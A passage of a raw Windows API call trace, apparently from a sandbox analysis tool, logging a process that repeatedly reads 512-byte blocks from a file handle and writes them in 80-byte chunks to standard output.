lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.979] GetFileType (hFile=0x4c) returned 0x1 [0144.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.979] GetFileType (hFile=0x4c) returned 0x1 [0144.979] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.980] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.981] GetFileType (hFile=0x4c) returned 0x1 [0144.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.981] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.981] GetFileType (hFile=0x4c) returned 0x1 [0144.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.981] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.981] GetFileType (hFile=0x4c) returned 0x1 [0144.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.981] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.981] GetFileType (hFile=0x4c) returned 0x1 [0144.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.981] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.981] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.981] GetFileType (hFile=0x4c) returned 0x1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] GetFileType (hFile=0x4c) returned 0x1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.982] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.982] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.982] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.982] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] GetFileType (hFile=0x4c) returned 0x1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] GetFileType (hFile=0x4c) returned 0x1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] GetFileType (hFile=0x4c) returned 0x1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] GetFileType (hFile=0x4c) returned 0x1 [0144.982] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.982] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] GetFileType (hFile=0x4c) returned 0x1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] GetFileType (hFile=0x4c) returned 0x1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] GetFileType (hFile=0x4c) returned 0x1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] GetFileType (hFile=0x4c) returned 0x1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.983] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.983] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.983] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.983] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] GetFileType (hFile=0x4c) returned 0x1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] GetFileType (hFile=0x4c) returned 0x1 [0144.983] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.983] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] GetFileType (hFile=0x4c) returned 0x1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] GetFileType (hFile=0x4c) returned 0x1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] GetFileType (hFile=0x4c) returned 0x1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] GetFileType (hFile=0x4c) returned 0x1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] GetFileType (hFile=0x4c) returned 0x1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] GetFileType (hFile=0x4c) returned 0x1 [0144.984] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.984] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.985] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.985] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.985] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.985] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] GetFileType (hFile=0x4c) returned 0x1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] GetFileType (hFile=0x4c) returned 0x1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] GetFileType (hFile=0x4c) returned 0x1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] GetFileType (hFile=0x4c) returned 0x1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] GetFileType (hFile=0x4c) returned 0x1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.985] GetFileType (hFile=0x4c) returned 0x1 [0144.985] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] GetFileType (hFile=0x4c) returned 0x1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] GetFileType (hFile=0x4c) returned 0x1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.986] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.986] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.986] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.986] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] GetFileType (hFile=0x4c) returned 0x1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] GetFileType (hFile=0x4c) returned 0x1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] GetFileType (hFile=0x4c) returned 0x1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.986] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.986] GetFileType (hFile=0x4c) returned 0x1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] GetFileType (hFile=0x4c) returned 0x1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] GetFileType (hFile=0x4c) returned 0x1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] GetFileType (hFile=0x4c) returned 0x1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] GetFileType (hFile=0x4c) returned 0x1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.987] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.987] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.987] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.987] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.987] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.987] GetFileType (hFile=0x4c) returned 0x1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] GetFileType (hFile=0x4c) returned 0x1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] GetFileType (hFile=0x4c) returned 0x1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] GetFileType (hFile=0x4c) returned 0x1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] GetFileType (hFile=0x4c) returned 0x1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] GetFileType (hFile=0x4c) returned 0x1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] GetFileType (hFile=0x4c) returned 0x1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.988] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.988] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] GetFileType (hFile=0x4c) returned 0x1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.989] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.989] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.989] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.989] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] GetFileType (hFile=0x4c) returned 0x1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] GetFileType (hFile=0x4c) returned 0x1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] GetFileType (hFile=0x4c) returned 0x1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] GetFileType (hFile=0x4c) returned 0x1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] WriteFile (in: hFile=0x4c, lpBuffer=0x20ecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ecb8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] GetFileType (hFile=0x4c) returned 0x1 [0144.989] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.989] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed08*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] GetFileType (hFile=0x4c) returned 0x1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] WriteFile (in: hFile=0x4c, lpBuffer=0x20ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ed58*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] GetFileType (hFile=0x4c) returned 0x1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] WriteFile (in: hFile=0x4c, lpBuffer=0x20eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20eda8*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] GetFileType (hFile=0x4c) returned 0x1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] WriteFile (in: hFile=0x4c, lpBuffer=0x20edf8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20edf8*, lpNumberOfBytesWritten=0x20ddfc*=0x20, lpOverlapped=0x0) returned 1 [0144.990] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.990] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dde8 | out: lpNewFilePointer=0x0) returned 1 [0144.990] _get_osfhandle (_FileHandle=4) returned 0x54 [0144.990] ReadFile (in: hFile=0x54, lpBuffer=0x20ec18, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20de08, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesRead=0x20de08*=0x200, lpOverlapped=0x0) returned 1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] GetFileType (hFile=0x4c) returned 0x1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] GetFileType (hFile=0x4c) returned 0x1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec18*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] GetFileType (hFile=0x4c) returned 0x1 [0144.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.990] WriteFile (in: hFile=0x4c, lpBuffer=0x20ec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20ddfc, lpOverlapped=0x0 | out: lpBuffer=0x20ec68*, lpNumberOfBytesWritten=0x20ddfc*=0x50, lpOverlapped=0x0) returned 1 [0144.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0144.991] GetFileType (hFile=0x4c) returned 0x1 